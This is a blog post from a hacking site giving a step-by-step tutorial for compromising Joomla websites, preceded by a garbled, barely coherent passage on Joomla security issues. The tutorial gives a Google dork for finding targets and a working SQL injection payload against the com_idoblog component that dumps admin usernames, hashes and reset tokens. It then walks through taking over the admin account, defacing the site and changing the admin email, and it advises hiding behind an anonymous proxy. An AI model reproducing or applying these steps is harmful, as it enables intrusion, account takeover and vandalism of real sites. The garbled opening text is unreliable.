Thursday

In , , by // // 1 comment

How To Hack Joomla Website (WMS) Learn Joomla Hacking

Togay going to 8 points discuss how to Joomla website can be ignored. And enter the game, and Hacker Joomla know how in less than -8? Ah, to be able to do this. However, if the user Joomla you do not know anything about the Joomla Hack to save your Joomla or so we come! For there is a way to keep the hacks on Joomla, I will show in this exhibition.

I will go through the experience and the next thing that should be done to stop them;

1. Over at the Joomla! / Extension / project.

2. Over use of vulnerable extensions / themes, and not from the time

3. Over helping the stolen information and login / weak

4. Over use of the software / server vulnerable old - Apache, PHP, MySQL.

5. Over the use of web server configuration

6. Over the full Health Management and Joomla on the same server

7. Over the wrong permissions Joomla

8. Over by the malware on the local PC can access the enemy's health


The patch released on July 31 , 2013 relating to the Joomla version 2.5.13 and 2.5.x before , and Joomla 3.1.4 and earlier versions 3.x. Joomla bug found by Versafe web safe and simple vulnerabilities are applied . Joomla version 2.5.14 and 3.1.5 . prepare and submit an unprivileged user to upload files live . PHP adding a " . " ( Tau ) at the end of the file name only PHP .
Back Joomla 2.5.x and 3.x versions , and one can access the media manager to download and execute code by a nurse at the end of the file name you want to run . For sites powered by Joomla version does not support ( 1.5.x and quick Google search shows that there are thousands of these sites and online 1.5.x ) , not the enemy after the data on the server for this to work with Joomla .
Acccording to the leader , and one - Versafe founder Ayal Gruner , in thousands of Phishing and malware killed in the consumer finance 30 + Umea in the first half of 2013 , the host Joomla based site 57 percent .
" What we saw last few months it is important to use a cheater can use the site to host the drive - Phishing babys killed , " said Gruner . He said the company received more than -100 in use to have accepted the malicious JavaScript that uses the Key bank account Trojan to help change the online fraud . Gruner said the release of the company using Joomla in early June .
Open - management system for easy distribution more content - can be put power in the hands of the tax that apply specifically to house whatungakaretao website . Earlier this month , warned as the safety of Arbor Networks found whatungakaretao website called " Fort dance " in Joomla and WordPress site is approved . Prior to this year , security firm Incapsula have found backdoored malicious code over 90,000 websites powered by WordPress .




Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

We hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

[Image: 001cv.png]

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

[Image: 002rg.png]

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have

[Image: 003bd.png]

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

[Image: 004k.png]

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request

[Image: 005hy.png]

Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

[Image: 006fj.png]

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

[Image: 007pa.png]

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!


To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

[Image: 009kw.png]
 

1 comment:

  1. Unknown21 January 2014 at 20:44

    Can U plz tell me what does it mean during SQLI when the site shows Not acceptable page?

    ReplyDelete

Earn 25$ Instant

Earn 25$ Instant

Designed By ComeToHack. In Association With Learn Hacking and MaKhDooM.

© 2014 Come To Hack